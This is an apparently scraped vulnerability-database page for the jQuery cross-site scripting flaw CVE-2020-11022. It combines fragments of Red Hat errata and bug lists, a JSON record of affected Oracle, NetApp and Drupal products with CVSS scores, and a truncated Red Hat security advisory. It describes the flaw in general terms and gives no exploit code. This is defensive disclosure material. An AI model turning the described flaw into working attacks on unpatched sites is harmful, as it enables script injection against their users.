JBEAP-23864 - (7.4.z) Upgrade xmlsec from 2.1.7.redhat-00001 to 2.2.3.redhat-00001 JBEAP-23865 - GSS Upgrade Apache CXF from 3.3.13.redhat-00001 to 3.4.10.redhat-00001 JBEAP-23866 - (7.4.z) Upgrade wss4j from 2.2.7.redhat-00001 to 2.3.3.redhat-00001 JBEAP-23927 - Tracker bug for the EAP 7.4.9 release for RHEL-8 JBEAP-24055 - (7.4.z) Upgrade HAL from 3.3.15.Final-redhat-00001 to 3.3.16.Final-redhat-00001 JBEAP-24081 - (7.4.z) Upgrade Elytron from 1.15.14.Final-redhat-00001 to 1.15.15.Final-redhat-00001 JBEAP-24095 - (7.4.z) Upgrade elytron-web from 1.9.2.Final-redhat-00001 to 1.9.3.Final-redhat-00001 JBEAP-24100 - GSS Upgrade Undertow from 2.2.20.SP1-redhat-00001 to 2.2.22.SP3-redhat-00001 JBEAP-24127 - (7.4.z) UNDERTOW-2123 - Update AsyncContextImpl.dispatch to use proper value JBEAP-24128 - (7.4.z) Upgrade Hibernate Search from 5.10.7.Final-redhat-00001 to 5.10.13.Final-redhat-00001 JBEAP-24132 - GSS Upgrade Ironjacamar from 1.5.3.SP2-redhat-00001 to 1.5.10.Final-redhat-00001 JBEAP-24147 - (7.4.z) Upgrade jboss-ejb-client from 4.0.45.Final-redhat-00001 to 4.0.49.Final-redhat-00001 JBEAP-24167 - (7.4.z) Upgrade WildFly Core from 15.0.19.Final-redhat-00001 to 15.0.21.Final-redhat-00002 JBEAP-24191 - GSS Upgrade remoting from 5.0.26.SP1-redhat-00001 to 5.0.27.Final-redhat-00001 JBEAP-24195 - GSS Upgrade JSF API from 3.0.0.SP06-redhat-00001 to 3.0.0.SP07-redhat-00001 JBEAP-24207 - (7.4.z) Upgrade Soteria from 1.0.1.redhat-00002 to 1.0.1.redhat-00003 JBEAP-24248 - (7.4.z) ELY-2492 - Upgrade sshd-common in Elytron from 2.7.0 to 2.9.2 JBEAP-24426 - (7.4.z) Upgrade Elytron from 1.15.15.Final-redhat-00001 to 1.15.16.Final-redhat-00001 JBEAP-24427 - (7.4.z) Upgrade WildFly Core from 15.0.21.Final-redhat-00002 to 15.0.22.Final-redhat-00001
- Description:
Security Fix(es):
- Addressed a security issue which can allow a malicious playbook author to elevate to the awx user from outside the isolated environment: CVE-2021-20253
- Upgraded to a more recent version of nginx to address CVE-2019-20372
- Upgraded to a more recent version of autobahn to address CVE-2020-35678
- Upgraded to a more recent version of jquery to address CVE-2020-11022 and CVE-2020-11023
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section. Solution:
For information on upgrading Ansible Tower, reference the Ansible Tower Upgrade and Migration Guide: https://docs.ansible.com/ansible-tower/latest/html/upgrade-migration-guide/index.html
- Description:
Red Hat Identity Management (IdM) is a centralized authentication, identity management, and authorization solution for both traditional and cloud-based enterprise environments.
The following packages have been upgraded to a later upstream version: ipa (4.8.7), softhsm (2.6.0), opendnssec (2.1.6). Bugs fixed (https://bugzilla.redhat.com/):
1399546 - CVE-2015-9251 jquery: Cross-site scripting via cross-domain ajax requests 1430365 - [RFE] Host-group names command rename 1488732 - fake_mname in named.conf is no longer effective 1585020 - Enable compat tree to provide information about AD users and groups on trust agents 1601614 - CVE-2018-14040 bootstrap: Cross-site Scripting (XSS) in the collapse data-parent attribute 1601617 - CVE-2018-14042 bootstrap: Cross-site Scripting (XSS) in the data-container property of tooltip 1651577 - [WebUI] IPA Error 3007: RequirmentError" while adding members in "User ID overrides" tab 1668082 - CVE-2018-20676 bootstrap: XSS in the tooltip data-viewport attribute 1668089 - CVE-2018-20677 bootstrap: XSS in the affix configuration target property 1668097 - CVE-2016-10735 bootstrap: XSS in the data-target attribute 1686454 - CVE-2019-8331 bootstrap: XSS in the tooltip or popover data-template attribute 1701233 - [RFE] support setting supported signature methods on the token 1701972 - CVE-2019-11358 jquery: Prototype pollution in object's prototype leading to denial of service, remote code execution, or property injection 1746830 - Memory leak during search of idview overrides 1750893 - Memory leak when slapi-nis return entries retrieved from nsswitch 1751295 - When sync-repl is enabled, slapi-nis can deadlock during retrochanglog trimming 1757045 - IDM Web GUI / IPA web UI: the ID override operation doesn't work in GUI (it works only from CLI) 1759888 - Rebase OpenDNSSEC to 2.1 1768156 - ERR - schemacompat - map rdlock: old way MAP_MONITOR_DISABLED 1777806 - When Service weight is set as 0 for server in IPA location "IPA Error 903: InternalError" is displayed 1793071 - CVE-2020-1722 ipa: No password length restriction leads to denial of service 1801698 - [RFE] Changing default hostgroup is too easy 1802471 - SELinux policy for ipa-custodia 1809835 - RFE: ipa group-add-member: number of failed should also be emphasized 1810154 - RFE: ipa-backup should compare locally and 
globally installed server roles 1810179 - ipa-client-install should name authselect backups and restore to that at uninstall time 1813330 - ipa-restore does not restart httpd 1816784 - KRA install fails if all KRA members are Hidden Replicas 1818765 - [Rebase] Rebase ipa to 4.8.6+ 1818877 - [Rebase] Rebase to softhsm 2.6.0+ 1828406 - CVE-2020-11022 jquery: Cross-site scripting due to improper injQuery.htmlPrefilter method 1831732 - AVC avc: denied { dac_override } for comm="ods-enforcerd 1831935 - AD authentication with IdM against SQL Server 1832331 - [abrt] [faf] 389-ds-base: unknown function(): /usr/sbin/ns-slapd killed by 11 1833266 - [dirsrv] set 'nsslapd-enable-upgrade-hash: off' as this raises warnings 1834264 - BIND rebase: rebuild against new so version 1834909 - softhsm use-after-free on process exit 1845211 - Rebase bind-dyndb-ldap to 11.3 1845537 - IPA bind configuration issue 1845596 - ipa trust-add fails with 'Fetching domains from trusted forest failed' 1846352 - cannot issue certs with multiple IP addresses corresponding to different hosts 1846434 - Remove ipa-idoverride-memberof as superceded by ipa-server 4.8.7 1847999 - EPN does not ship its default configuration ( /etc/ipa/epn.conf ) in freeipa-client-epn 1849914 - FreeIPA - Utilize 256-bit AJP connector passwords 1851411 - ipa: typo issue in ipanthomedirectoryrive deffinition 1852244 - ipa-healthcheck inadvertently obsoleted in RHEL 8.2 1853263 - ipa-selinux package missing 1857157 - replica install failing with avc denial for custodia component 1858318 - AttributeError: module 'ssl' has no attribute 'SSLCertVerificationError' when upgrading ca-less ipa master 1859213 - AVC denial during ipa-adtrust-install --add-agents 1863079 - ipa-epn command displays 'exception: ConnectionRefusedError: [Errno 111] Connection refused' 1863616 - CA-less install does not set required permissions on KDC certificate 1866291 - EPN: enhance input validation 1866938 - ipa-epn fails to retrieve user data if some 
user attributes are not present 1868432 - Unhandled Python exception in '/usr/libexec/ipa/ipa-pki-retrieve-key' 1869311 - ipa trust-add fails with 'Fetching domains from trusted forest failed' 1870202 - File permissions of /etc/ipa/ca.crt differ between CA-ful and CA-less 1874015 - ipa hbacrule-add-service --hbacsvcs=sshd is not applied successfully for subdomain 1875348 - Valgrind reports a memory leak in the Schema Compatibility plugin. 1879604 - pkispawn logs files are empty
- Description:
- Fixed two jQuery vulnerabilities (CVE-2020-11022, CVE-2020-11023)
- Improved Ansible Tower's web service configuration to allow for processing more simultaneous HTTP(s) requests by default
- Updated several dependencies of Ansible Tower's User Interface to address CVE-2020-7720, CVE-2020-7743, and CVE-2020-7676
- Updated to the latest version of python-psutil to address CVE-2019-18874
- Added several optimizations to improve performance for a variety of high-load simultaneous job launch use cases
- Fixed workflows to no longer prevent certain users from being able to edit approval nodes
- Fixed confusing behavior for social auth logins across distinct browser tabs
- Fixed launching of Job Templates that use prompt-at-launch Ansible Vault credentials
3
Show details on source website{ "@context": { "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#", affected_products: { "@id": "https://www.variotdbs.pl/ref/affected_products", }, configurations: { "@id": "https://www.variotdbs.pl/ref/configurations", }, credits: { "@id": "https://www.variotdbs.pl/ref/credits", }, cvss: { "@id": "https://www.variotdbs.pl/ref/cvss/", }, description: { "@id": "https://www.variotdbs.pl/ref/description/", }, exploit_availability: { "@id": "https://www.variotdbs.pl/ref/exploit_availability/", }, external_ids: { "@id": "https://www.variotdbs.pl/ref/external_ids/", }, iot: { "@id": "https://www.variotdbs.pl/ref/iot/", }, iot_taxonomy: { "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/", }, patch: { "@id": "https://www.variotdbs.pl/ref/patch/", }, problemtype_data: { "@id": "https://www.variotdbs.pl/ref/problemtype_data/", }, references: { "@id": "https://www.variotdbs.pl/ref/references/", }, sources: { "@id": "https://www.variotdbs.pl/ref/sources/", }, sources_release_date: { "@id": "https://www.variotdbs.pl/ref/sources_release_date/", }, sources_update_date: { "@id": "https://www.variotdbs.pl/ref/sources_update_date/", }, threat_type: { "@id": "https://www.variotdbs.pl/ref/threat_type/", }, title: { "@id": "https://www.variotdbs.pl/ref/title/", }, type: { "@id": "https://www.variotdbs.pl/ref/type/", }, }, "@id": "https://www.variotdbs.pl/vuln/VAR-202004-2191", affected_products: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/affected_products#", data: { "@container": "@list", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { model: "jdeveloper", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "jdeveloper", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "financial services data foundation", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { 
model: "financial services analytical applications infrastructure", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6.0.0", }, { model: "hospitality simphony", scope: "eq", trust: 1, vendor: "oracle", version: "19.1.0-19.1.2", }, { model: "financial services market risk measurement and management", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.8", }, { model: "drupal", scope: "gte", trust: 1, vendor: "drupal", version: "8.7.0", }, { model: "financial services liquidity risk measurement and management", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "financial services analytical applications infrastructure", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "h300s", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "drupal", scope: "lt", trust: 1, vendor: "drupal", version: "8.7.14", }, { model: "communications billing and revenue management", scope: "eq", trust: 1, vendor: "oracle", version: "12.0.0.3.0", }, { model: "financial services analytical applications reconciliation framework", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.8", }, { model: "hospitality materials control", scope: "eq", trust: 1, vendor: "oracle", version: "18.1", }, { model: "hospitality simphony", scope: "lte", trust: 1, vendor: "oracle", version: "19.1.2", }, { model: "financial services data governance for us regulatory reporting", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.9", }, { model: "policy automation connector for siebel", scope: "eq", trust: 1, vendor: "oracle", version: "10.4.6", }, { model: "financial services analytical applications reconciliation framework", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "financial services basel regulatory capital basic", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.8", }, { model: "enterprise session border controller", scope: "eq", trust: 1, vendor: "oracle", version: "8.4", }, { model: "financial 
services institutional performance analytics", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "financial services profitability management", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "retail back office", scope: "eq", trust: 1, vendor: "oracle", version: "14.0", }, { model: "snapcenter", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "drupal", scope: "gte", trust: 1, vendor: "drupal", version: "8.8.0", }, { model: "financial services price creation and discovery", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "insurance data foundation", scope: "lte", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "banking digital experience", scope: "eq", trust: 1, vendor: "oracle", version: "20.1", }, { model: "insurance allocation manager for enterprise profitability", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "financial services analytical applications reconciliation framework", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "financial services liquidity risk measurement and management", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "insurance accounting analyzer", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.9", }, { model: "financial services loan loss forecasting and provisioning", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "financial services funds transfer pricing", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "insurance data foundation", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "agile product lifecycle management for process", scope: "eq", trust: 1, vendor: "oracle", version: "6.2.0.0", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 1, vendor: "oracle", version: "8.58", }, { model: "communications eagle application processor", scope: "gte", trust: 1, vendor: "oracle", 
version: "16.1.0", }, { model: "banking digital experience", scope: "eq", trust: 1, vendor: "oracle", version: "18.2", }, { model: "jquery", scope: "gte", trust: 1, vendor: "jquery", version: "1.2", }, { model: "financial services basel regulatory capital basic", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "financial services data governance for us regulatory reporting", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "financial services profitability management", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "drupal", scope: "gte", trust: 1, vendor: "drupal", version: "7.0", }, { model: "blockchain platform", scope: "lt", trust: 1, vendor: "oracle", version: "21.1.2", }, { model: "drupal", scope: "lt", trust: 1, vendor: "drupal", version: "8.8.6", }, { model: "communications diameter signaling router idih\\:", scope: "lte", trust: 1, vendor: "oracle", version: "8.2.2", }, { model: "fedora", scope: "eq", trust: 1, vendor: "fedoraproject", version: "31", }, { model: "financial services loan loss forecasting and provisioning", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "insurance insbridge rating and underwriting", scope: "gte", trust: 1, vendor: "oracle", version: "5.0.0.0", }, { model: "financial services regulatory reporting for european banking authority", scope: "lte", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "h300e", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "banking digital experience", scope: "eq", trust: 1, vendor: "oracle", version: "19.2", }, { model: "healthcare foundation", scope: "eq", trust: 1, vendor: "oracle", version: "7.2.0", }, { model: "siebel ui framework", scope: "eq", trust: 1, vendor: "oracle", version: "20.8", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "14.1.1.0.0", }, { model: "banking digital experience", scope: "lte", trust: 1, vendor: "oracle", version: 
"20.1", }, { model: "h700e", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.3.0", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "12.2.1.4.0", }, { model: "h500s", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "financial services funds transfer pricing", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "financial services price creation and discovery", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "healthcare foundation", scope: "eq", trust: 1, vendor: "oracle", version: "7.2.1", }, { model: "policy automation", scope: "lte", trust: 1, vendor: "oracle", version: "12.2.20", }, { model: "oncommand system manager", scope: "gte", trust: 1, vendor: "netapp", version: "3.0", }, { model: "financial services profitability management", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "financial services hedge management and ifrs valuations", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "enterprise manager ops center", scope: "eq", trust: 1, vendor: "oracle", version: "12.4.0.0", }, { model: "banking digital experience", scope: "gte", trust: 1, vendor: "oracle", version: "18.1", }, { model: "policy automation", scope: "gte", trust: 1, vendor: "oracle", version: "12.2.0", }, { model: "financial services asset liability management", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "communications application session controller", scope: "eq", trust: 1, vendor: "oracle", version: "3.8m0", }, { model: "financial services basel regulatory capital internal ratings based approach", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "financial services market risk measurement and management", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "linux", scope: "eq", trust: 1, 
vendor: "debian", version: "9.0", }, { model: "banking digital experience", scope: "eq", trust: 1, vendor: "oracle", version: "18.3", }, { model: "financial services hedge management and ifrs valuations", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "10.3.6.0.0", }, { model: "fedora", scope: "eq", trust: 1, vendor: "fedoraproject", version: "33", }, { model: "financial services basel regulatory capital internal ratings based approach", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.8", }, { model: "drupal", scope: "lt", trust: 1, vendor: "drupal", version: "7.70", }, { model: "insurance insbridge rating and underwriting", scope: "eq", trust: 1, vendor: "oracle", version: "5.6.1.0", }, { model: "financial services balance sheet planning", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.8", }, { model: "financial services funds transfer pricing", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "retail returns management", scope: "eq", trust: 1, vendor: "oracle", version: "14.1", }, { model: "hospitality simphony", scope: "eq", trust: 1, vendor: "oracle", version: "18.1", }, { model: "insurance allocation manager for enterprise profitability", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.8", }, { model: "financial services asset liability management", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "insurance data foundation", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.6-8.1.0", }, { model: "peoplesoft enterprise peopletools", scope: "eq", trust: 1, vendor: "oracle", version: "8.56", }, { model: "financial services basel regulatory capital basic", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "financial services regulatory reporting for us federal reserve", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.9", }, { model: "peoplesoft enterprise peopletools", 
scope: "eq", trust: 1, vendor: "oracle", version: "8.57", }, { model: "leap", scope: "eq", trust: 1, vendor: "opensuse", version: "15.2", }, { model: "communications services gatekeeper", scope: "eq", trust: 1, vendor: "oracle", version: "7.0", }, { model: "financial services data integration hub", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "healthcare foundation", scope: "eq", trust: 1, vendor: "oracle", version: "7.3.0", }, { model: "insurance insbridge rating and underwriting", scope: "lte", trust: 1, vendor: "oracle", version: "5.6.0.0", }, { model: "hospitality simphony", scope: "eq", trust: 1, vendor: "oracle", version: "18.2", }, { model: "financial services data foundation", scope: "lte", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "policy automation for mobile devices", scope: "lte", trust: 1, vendor: "oracle", version: "12.2.20", }, { model: "storagetek acsls", scope: "eq", trust: 1, vendor: "oracle", version: "8.5.1", }, { model: "snap creator framework", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "financial services basel regulatory capital internal ratings based approach", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "h410c", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "banking digital experience", scope: "eq", trust: 1, vendor: "oracle", version: "18.1", }, { model: "policy automation for mobile devices", scope: "gte", trust: 1, vendor: "oracle", version: "12.2.0", }, { model: "jquery", scope: "lt", trust: 1, vendor: "jquery", version: "3.5.0", }, { model: "financial services liquidity risk management", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "oncommand insight", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "fedora", scope: "eq", trust: 1, vendor: "fedoraproject", version: "32", }, { model: "financial services analytical applications infrastructure", scope: "lte", trust: 1, vendor: 
"oracle", version: "8.1.0.0.0", }, { model: "h500e", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "h410s", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "log correlation engine", scope: "lt", trust: 1, vendor: "tenable", version: "6.0.9", }, { model: "communications diameter signaling router idih\\:", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.0", }, { model: "healthcare foundation", scope: "eq", trust: 1, vendor: "oracle", version: "7.1.1", }, { model: "financial services data integration hub", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "communications eagle application processor", scope: "lte", trust: 1, vendor: "oracle", version: "16.4.0", }, { model: "financial services asset liability management", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "financial services regulatory reporting for us federal reserve", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "max data", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "financial services institutional performance analytics", scope: "eq", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "financial services regulatory reporting for european banking authority", scope: "gte", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "jdeveloper", scope: "eq", trust: 1, vendor: "oracle", version: "11.1.1.9.0", }, { model: "retail returns management", scope: "eq", trust: 1, vendor: "oracle", version: "14.0", }, { model: "financial services loan loss forecasting and provisioning", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.8", }, { model: "agile product supplier collaboration for process", scope: "eq", trust: 1, vendor: "oracle", version: "6.2.0.0", }, { model: "financial services analytical applications infrastructure", scope: "lte", trust: 1, vendor: "oracle", version: "8.1.0", }, { model: "application testing suite", scope: "eq", trust: 1, 
vendor: "oracle", version: "13.3.0.1", }, { model: "retail back office", scope: "eq", trust: 1, vendor: "oracle", version: "14.1", }, { model: "hospitality simphony", scope: "gte", trust: 1, vendor: "oracle", version: "19.1.0", }, { model: "banking digital experience", scope: "eq", trust: 1, vendor: "oracle", version: "19.1", }, { model: "weblogic server", scope: "eq", trust: 1, vendor: "oracle", version: "12.1.3.0.0", }, { model: "communications webrtc session controller", scope: "eq", trust: 1, vendor: "oracle", version: "7.2", }, { model: "communications billing and revenue management", scope: "eq", trust: 1, vendor: "oracle", version: "7.5.0.23.0", }, { model: "financial services hedge management and ifrs valuations", scope: "lte", trust: 1, vendor: "oracle", version: "8.0.8", }, { model: "financial services institutional performance analytics", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.7", }, { model: "financial services data integration hub", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.6", }, { model: "leap", scope: "eq", trust: 1, vendor: "opensuse", version: "15.1", }, { model: "h700s", scope: "eq", trust: 1, vendor: "netapp", version: null, }, { model: "financial services liquidity risk measurement and management", scope: "eq", trust: 1, vendor: "oracle", version: "8.0.8", }, { model: "retail customer management and segmentation foundation", scope: "eq", trust: 1, vendor: "oracle", version: "19.0", }, { model: "oncommand system manager", scope: "lte", trust: 1, vendor: "netapp", version: "3.1.3", }, ], sources: [ { db: "NVD", id: "CVE-2020-11022", }, ], }, credits: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/credits#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "Red Hat", sources: [ { db: "PACKETSTORM", id: "159852", }, { db: "PACKETSTORM", id: "170823", }, { db: "PACKETSTORM", id: "161727", }, { db: "PACKETSTORM", id: "159876", }, { db: 
"PACKETSTORM", id: "160274", }, ], trust: 0.5, }, cve: "CVE-2020-11022", cvss: { "@context": { cvssV2: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2", }, cvssV3: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#", }, "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/", }, severity: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/cvss/severity#", }, "@id": "https://www.variotdbs.pl/ref/cvss/severity", }, sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, "@id": "https://www.variotdbs.pl/ref/sources", }, }, data: [ { cvssV2: [ { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "nvd@nist.gov", availabilityImpact: "NONE", baseScore: 4.3, confidentialityImpact: "NONE", exploitabilityScore: 8.6, id: "CVE-2020-11022", impactScore: 2.9, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 1.1, vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N", version: "2.0", }, { accessComplexity: "MEDIUM", accessVector: "NETWORK", authentication: "NONE", author: "VULHUB", availabilityImpact: "NONE", baseScore: 4.3, confidentialityImpact: "NONE", exploitabilityScore: 8.6, id: "VHN-163559", impactScore: 2.9, integrityImpact: "PARTIAL", severity: "MEDIUM", trust: 0.1, vectorString: "AV:N/AC:M/AU:N/C:N/I:P/A:N", version: "2.0", }, ], cvssV3: [ { attackComplexity: "LOW", attackVector: "NETWORK", author: "nvd@nist.gov", availabilityImpact: "NONE", baseScore: 6.1, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", exploitabilityScore: 2.8, id: "CVE-2020-11022", impactScore: 2.7, integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", trust: 1, userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", version: "3.1", }, { attackComplexity: "HIGH", attackVector: "NETWORK", author: 
"security-advisories@github.com", availabilityImpact: "NONE", baseScore: 6.9, baseSeverity: "MEDIUM", confidentialityImpact: "HIGH", exploitabilityScore: 1.6, id: "CVE-2020-11022", impactScore: 4.7, integrityImpact: "LOW", privilegesRequired: "NONE", scope: "CHANGED", trust: 1, userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:H/I:L/A:N", version: "3.1", }, ], severity: [ { author: "nvd@nist.gov", id: "CVE-2020-11022", trust: 1, value: "MEDIUM", }, { author: "security-advisories@github.com", id: "CVE-2020-11022", trust: 1, value: "MEDIUM", }, { author: "VULHUB", id: "VHN-163559", trust: 0.1, value: "MEDIUM", }, { author: "VULMON", id: "CVE-2020-11022", trust: 0.1, value: "MEDIUM", }, ], }, ], sources: [ { db: "VULHUB", id: "VHN-163559", }, { db: "VULMON", id: "CVE-2020-11022", }, { db: "NVD", id: "CVE-2020-11022", }, { db: "NVD", id: "CVE-2020-11022", }, ], }, description: { "@context": { "@vocab": "https://www.variotdbs.pl/ref/description#", sources: { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", }, }, }, data: "In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. jQuery is an open source, cross-browser JavaScript library developed by the American programmer John Resig. The library simplifies interaction between HTML and JavaScript, and is modular and extensible through plug-ins. A cross-site scripting vulnerability exists in jQuery versions 1.2 up to (but not including) 3.5.0. The vulnerability stems from a lack of correct validation of client data in web applications. An attacker could exploit this vulnerability to execute client-side code. 
-----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA256\n\n==================================================================== \nRed Hat Security Advisory\n\nSynopsis: Moderate: pki-core:10.6 and pki-deps:10.6 security, bug fix, and enhancement update\nAdvisory ID: RHSA-2020:4847-01\nProduct: Red Hat Enterprise Linux\nAdvisory URL: https://access.redhat.com/errata/RHSA-2020:4847\nIssue date: 2020-11-03\nCVE Names: CVE-2015-9251 CVE-2016-10735 CVE-2018-14040\n CVE-2018-14042 CVE-2019-8331 CVE-2019-10146\n CVE-2019-10179 CVE-2019-10221 CVE-2019-11358\n CVE-2020-1721 CVE-2020-11022 CVE-2020-11023\n CVE-2020-15720\n====================================================================\n1. Summary:\n\nAn update for the pki-core:10.6 and pki-deps:10.6 modules is now available\nfor Red Hat Enterprise Linux 8. \n\nRed Hat Product Security has rated this update as having a security impact\nof Moderate. A Common Vulnerability Scoring System (CVSS) base score, which\ngives a detailed severity rating, is available for each vulnerability from\nthe CVE link(s) in the References section. \n\n2. Relevant releases/architectures:\n\nRed Hat Enterprise Linux AppStream (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64\n\n3. Description:\n\nThe Public Key Infrastructure (PKI) Core contains fundamental packages\nrequired by Red Hat Certificate System. 
\n\nSecurity Fix(es):\n\n* jquery: Cross-site scripting via cross-domain ajax requests\n(CVE-2015-9251)\n\n* bootstrap: XSS in the data-target attribute (CVE-2016-10735)\n\n* bootstrap: Cross-site Scripting (XSS) in the collapse data-parent\nattribute (CVE-2018-14040)\n\n* bootstrap: Cross-site Scripting (XSS) in the data-container property of\ntooltip (CVE-2018-14042)\n\n* bootstrap: XSS in the tooltip or popover data-template attribute\n(CVE-2019-8331)\n\n* jquery: Prototype pollution in object's prototype leading to denial of\nservice, remote code execution, or property injection (CVE-2019-11358)\n\n* jquery: Cross-site scripting due to improper injQuery.htmlPrefilter\nmethod (CVE-2020-11022)\n\n* jquery: Passing HTML containing <option> elements to manipulation methods\ncould result in untrusted code execution (CVE-2020-11023)\n\n* pki: Dogtag's python client does not validate certificates\n(CVE-2020-15720)\n\n* pki-core: Reflected XSS in 'path length' constraint field in CA's Agent\npage (CVE-2019-10146)\n\n* pki-core/pki-kra: Reflected XSS in recoveryID search field at KRA's DRM\nagent page in authorize recovery tab (CVE-2019-10179)\n\n* pki-core: Reflected XSS in getcookies?url= endpoint in CA\n(CVE-2019-10221)\n\n* pki-core: KRA vulnerable to reflected XSS via the getPk12 page\n(CVE-2020-1721)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. \n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat\nEnterprise Linux 8.3 Release Notes linked from the References section. \n\n4. Solution:\n\nFor details on how to apply this update, which includes the changes\ndescribed in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258\n\n5. 
